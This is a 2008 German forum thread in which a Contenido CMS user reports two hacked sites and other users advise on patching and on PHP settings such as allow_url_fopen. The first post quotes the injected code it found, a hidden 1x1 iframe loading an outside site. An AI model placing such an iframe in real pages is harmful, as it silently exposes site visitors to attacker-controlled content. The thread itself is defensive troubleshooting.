Projekte gehackt?

Käferli · Beitrag von **Käferli** » Mo 30. Jun 2008, 11:59

Hallo,

habe zwei Projekte, bei denen gestern folgendes bei Aufruf der Seite angezeigt wurde:

Cannot modify header information - headers already sent...

Habe dann mir mir alles auf dem Server angeschaut und bin in der front_content.php fündig geworden,
da stand nach dem regulären Script:

Code: Alles auswählen


?>
<iframe src="http://jopaevropa.net" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

nach dem Auswechseln ging alles wieder, es sind beide Male die Versionen 4.6.15 mr im Einsatz,
was muss ich tun? Update könnte bezüglich Kosten schwierig werden. Welche Rechte darf der Ordner CMS maximal haben
und welche Dateireichte die front_content.php selbst?

Ich bin für jeden Tipp dankbar!

Sonnige Grüße Käferli

phpchris · Beitrag von **phpchris** » Mo 30. Jun 2008, 12:11

Denke nicht, dass du da mit Dateirechten weiterkommst.
Ein Update, bzw. ein Hotfix muss da schon erfolgen.

Schau dir mal den hier an:

http://forum.contenido.org/viewtopic.php?t=18791

Ist relativ einfach zu machen. Bereite alle Dateien vor, am besten legst du schon die richtige Ordnerstruktur an und lade sie ins Backend der Projekte hoch.

Dann die .htaccess anlegen und schon bist du in trockenen Tüchern.
Die PHP-Einstellung "Allow_url_fopen" solltest du auch ausstellen.

Käferli · Beitrag von **Käferli** » Mo 30. Jun 2008, 12:23

Danke für die rasche Antwort.
Was ist denn die aktuelle Version für das Mode-Rewrite Bundle,
hatte jetzt 4.6.15?

Ach Mensch, das manche Leute keine besseren Ideen haben, als
die Websites anderer zu hacken...

Updates an aktiven Seiten bereiten mir immer etwas Bauchschmerzen...

phpchris · Beitrag von **phpchris** » Mo 30. Jun 2008, 13:36

Kein Update...

Guck doch mal den Beitrag durch, den ich verlinkt hatte.

Käferli · Beitrag von **Käferli** » Mo 30. Jun 2008, 19:05

Danke für die Unterstützung! Der Provider sagt, eine globale Änderung auf

Code: Alles auswählen

 allow_url_fopen = Off

ist nicht möglich.

Ich soll eine entsprechende .ini in jedes Verzeichnis kopieren, in der ich diese Einstellung wünsche.

Reicht das jeweils im CMS- und Contenido-Ordner, oder auch alle Unterordner? Hat damit jemand Erfahrung?

Die Änderungen in der Artikel-Liste von:

Code: Alles auswählen

list ($width, $height, $type, $attr) = getimagesize($image);

in

Code: Alles auswählen

list ($width, $height, $type, $attr) = getimagesize(str_replace($cfgClient[$client]["path"]["htmlpath"], $cfgClient[$client]["path"]["frontend"], $image));

haben leider dazugeführt, dass keine Bilder mehr angezeigt worden.

Käferli · Beitrag von **Käferli** » Di 1. Jul 2008, 00:06

Hab jetzt alles hinbekommen!

Meine Seite hat sogar jetzt den Selbsttest bestanden.

Danke für die tolle Unterstützung!!!

Nur die Frage, muss die php.ini in jedes Unterverzeichnis auch vom
Contenido-Ordner?

phpchris · Beitrag von **phpchris** » Di 1. Jul 2008, 08:30

Ich meine, die PHP.ini muss nur ins root-verzeichnis des Webspaces.
Aber da frag am besten den Provider.

kloevekorn · Beitrag von **kloevekorn** » Do 17. Jul 2008, 12:15

phpchris hat geschrieben:Ich meine, die PHP.ini muss nur ins root-verzeichnis des Webspaces.
Aber da frag am besten den Provider.

Probiert doch einfach per phpinfo() aus, auf welche Verzeichnisse sich die php.ini auswirkt.